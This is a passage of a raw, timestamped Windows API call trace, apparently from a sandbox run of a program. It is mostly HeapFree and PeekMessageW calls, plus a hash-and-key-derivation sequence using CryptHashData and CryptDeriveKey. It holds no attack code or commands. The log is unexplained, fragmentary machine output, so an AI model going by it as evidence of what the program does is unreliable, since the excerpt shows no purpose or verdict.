wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.464] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0158.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.464] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.464] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0158.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0158.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0158.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0158.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0158.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.466] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.466] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0158.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.466] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.467] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0158.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x9bd6f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.468] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDeriveKey") returned 0x74f63188 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0158.468] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0158.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.470] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree 